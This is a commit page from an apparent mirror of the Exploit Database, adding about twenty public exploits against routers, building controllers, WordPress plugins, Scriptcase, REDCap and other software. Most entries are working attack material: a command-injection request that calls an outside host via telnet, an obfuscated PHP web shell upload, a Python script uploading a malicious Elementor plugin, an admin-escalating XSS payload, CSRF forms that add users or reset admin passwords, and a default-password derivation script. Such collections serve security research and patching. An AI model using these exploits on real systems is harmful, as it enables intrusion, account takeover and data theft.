bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-04-20

Browse source 
21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
This commit is contained in:
Offensive Security 2022-04-20 05:01:45 +00:00
parent 6457d1796d
commit 093714dc70
22 changed files with 906 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
exploits/hardware/remote/50870.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
HTTP Request :
POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login

67
exploits/hardware/remote/50875.txt Normal file
View file

@ -0,0 +1,67 @@
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131
Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.
Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.
Tested on: lighttpd-web
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
17.02.2022
--
snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//
console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;
const doAjax = async () => {
const resp = await fetch(def);
if (resp.ok) {
const jsonyo = await resp.json();
return Promise.resolve(jsonyo);
} else {
return Promise.reject("Smth not rite captain!");
}
}
doAjax().then(console.log).catch(console.log);
await new Promise(t => setTimeout(t, 1337));
console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));

78
exploits/hardware/remote/50878.html Normal file
View file

@ -0,0 +1,78 @@
# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
06.04.2022
-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="zsl" />
<input type="hidden" name="Password" value="123t00t" />
<input type="hidden" name="AutoLogout" value="17" />
<input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
<input type="hidden" name="ObjRef" value="" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Add" />
<input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="DELTA" />
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="AutoLogout" value="30" />
<input type="hidden" name="SS&#95;SelectedOptionId" value="" />
<input type="hidden" name="ObjRef" value="ZSL-251" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Edit" />
<input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>

56
exploits/hardware/remote/50879.html Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
06.04.2022
-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
<input type="hidden" name="userInfo" value="" />
<input type="hidden" name="UL&#95;SelectedOptionId" value="" />
<input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
<input type="hidden" name="formAction" value="Delete" />
<input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>

48
exploits/hardware/remote/50880.txt Normal file
View file

@ -0,0 +1,48 @@
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application suffers from a cleartext transmission/storage
of sensitive information in a Cookie. This allows a remote
attacker to intercept the HTTP Cookie authentication credentials
through a man-in-the-middle attack.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
06.04.2022
--
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close

1
exploits/multiple/webapps/50512.py
View file

@ -2,7 +2,6 @@
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Software Link: https://github.com/Balgogan/CVE-2021-41773
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013

35
exploits/php/webapps/50869.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
# Date: 2022-04-11
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:
Vulnerable File:sync-urls-repository.php
public function insertUrls($roomId, $urls)
{
global $wpdb;
if (empty($urls)) {
return;
}
$urls = $this->prepareUrls($urls);
$values = array();
foreach ($urls as $syncId => $url) {
$values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url);
}
$sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)"
. " VALUES " . implode(', ', $values);
$wpdb->query($sql);
Vulnerable Parameter:
room_id=SQL Injection
sync_id=SQL Injection

81
exploits/php/webapps/50871.rb Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
# Author website: https://pwn.by/noraj/
# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
# Date: 2022-04-11
# Vendor Homepage: https://easyappointments.org/
# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
# Version: < 1.4.3 (it means up to 1.4.2)
# Tested on: Easy!Appointments Version 1.3.2
# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
## - https://github.com/alextselegidis/easyappointments/tree/1.4.2
## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
#!/usr/bin/env ruby
require 'date'
require 'httpx'
require 'docopt'
doc = <<~DOCOPT
Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure
Source: https://github.com/Acceis/exploit-CVE-2022-0482
Usage:
#{__FILE__} <url> [<startDate> <endDate>] [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<startDate> All events since (default: 2015-01-11)
<endDate> All events until (default: today)
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} http://10.0.0.1
#{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT
def fetch_csrf(root_url, http)
vuln_url = "#{root_url}/index.php"
http.get(vuln_url)
end
def exploit(root_url, startDate, endDate, http)
vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"
params = {
'csrfToken' => http.cookies.first.value, # csrfCookie
'startDate' => startDate.nil? ? '2015-01-11' : startDate,
'endDate' => endDate.nil? ? Date.today.to_s : endDate
}
http.post(vuln_url, form: params)
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
http = HTTPX.plugin(:cookies)
fetch_csrf(args['<url>'], http)
puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
rescue Docopt::Exit => e
puts e.message
end

47
exploits/php/webapps/50872.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019
# Proof of Concept:
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php

27
exploits/php/webapps/50874.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A
# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing
potentially dangerous characters to be inserted. This includes the reported payload, which
triggers a persistent Cross-Site Scripting (XSS).
# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video)
the following payload:
" autofocus onfocus=alert(/XSS/)>.
e. Save the changes. "Edit" button.
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.
Note: This change will be permanent until you modify the edited field.

23
exploits/php/webapps/50876.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04
1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload)
Click 'Add' what triggers the XSS payload
Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>

44
exploits/php/webapps/50877.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
### Stored XSS Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.
- Where: Missing Data Code.
- Payload:
<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.
function privesc()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.withCredentials = "true";
var body = "";
body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
xhr.send(body);
return true;
}
privesc();
</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
+ Store: Low privileged user is able to store Missing Data Code values.
+ Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX

18
exploits/php/webapps/50881.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg
XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) And capture this request in burp , and send to repeater.
3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.
This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability

118
exploits/php/webapps/50882.py Executable file
View file

@ -0,0 +1,118 @@
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.62
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
#!/usr/bin/python
import requests
import re
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
# add_action( 'admin_init', function() {
# if ( wp_doing_ajax() &&
# isset( $_POST['action'] ) &&
# isset( $_POST['_nonce'] ) &&
# wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
# ) {
# $this->maybe_handle_ajax();
# }
# } );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
# return;
# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies
def DoLogin(username, password):
global cookies
loginUrl = baseUrl + 'wp-login.php'
adminUrl = baseUrl + 'wp-admin/'
data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
# 4e8878bdba is just an example of nonce. It can be anything else.
regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
response = session.post(loginUrl, cookies=cookies, data=data)
search = regexp.search(response.text)
if not search:
# I've tested this on WordPress v. 5.9.3
# Fix the regexp if needed.
print('Error - Invalid credentials?')
#print(response.text)
else:
return search.group(1)
def UploadFile(fileName, nonce):
uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
files = { 'fileToUpload' : open(fileName, 'rb') }
regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
response = session.post(uploadUrl, data=data, files=files)
search = regexp.search(response.text)
if not search:
# If Elemento Pro is already installed, the upload will fail.
# You can print the response to investigate further
print ('Error - Upload failed')
# print (response.text)
return False
else:
print ('Upload completed successfully!')
return True
# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
payloadUrl = baseUrl + 'index.php?activate=1'
session.get(payloadUrl)
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
# Define YOUR method to activate your payload (if needed)
if fileUploaded:
print ('Activating payload...')
ActivatePayload()

13
exploits/php/webapps/50884.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA
# Date: 11/03/2022
# Exploit Author: Ali J
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
# Version: 1.5.0
# Tested on: Windows 10
Steps to Reproduce:
1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request.
3. Login with user 2 in a seperate browser and execute the CSRF POC.
4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.

23
exploits/windows/local/50867.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1
#PoC :
==============
C:\>sc qc MSExchangeMailboxAssistants
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: MSExchangeMailboxAssistants
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants
DIPENDENZE :
SERVICE_START_NAME : LocalSystem

23
exploits/windows/local/50868.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1
#PoC :
==============
C:\>sc qc MSExchangeADTopology
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: MSExchangeADTopology
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology
DIPENDENZE :
SERVICE_START_NAME : LocalSystem

22
exploits/windows/local/50883.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kağan Çapar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
